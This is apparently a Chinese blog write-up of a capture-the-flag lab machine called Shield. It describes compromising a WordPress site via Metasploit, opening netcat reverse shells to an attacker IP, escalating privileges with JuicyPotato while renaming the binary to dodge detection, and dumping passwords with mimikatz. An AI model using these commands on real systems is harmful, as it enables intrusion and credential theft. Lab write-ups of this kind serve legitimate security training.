靶机-Shield

搜集

打开了 80 和 3306 端口,web 和 mysql 服务

web

目录爆破----得到 WordPress 博客页面,这里的密码居然又是上一题得到的密码

获取 usershell

因为知道 CMS 的登录密码,所以可以使用 msf 通过现成的 payload 直接打,获取 shell....

exploit---wp_admin_shell_upload

得到 meterpreter 交互,应为它不是特别稳定,上传个 nc.exe(原来这个软件 kali 下有),本地监听,execute -f nc.exe -a "-e cmd.exe 10.10.16.64 1234"得到新的 shell

sysinfometer 语法,得到系统信息是 win2016,原来可以用烂土豆提权

提权

上传JuicyPotato.exe,而且一般还要更改它的名字,防止被 win 系统过滤

提权 payload

 C:\inetpub\wwwroot\wordpress\wp-content\uploads>echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.16.64 1111 > shell.bat

写入到 shell.bat 中

现在本地监听 1111 端口,,提权命令

 js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337

 

后渗透

上传mimikatz.exe,system 权限下运行,获得登录密码

posted @ 2021-12-11 17:46  kzd的前沿思考  阅读(50)  评论(0编辑  收藏  举报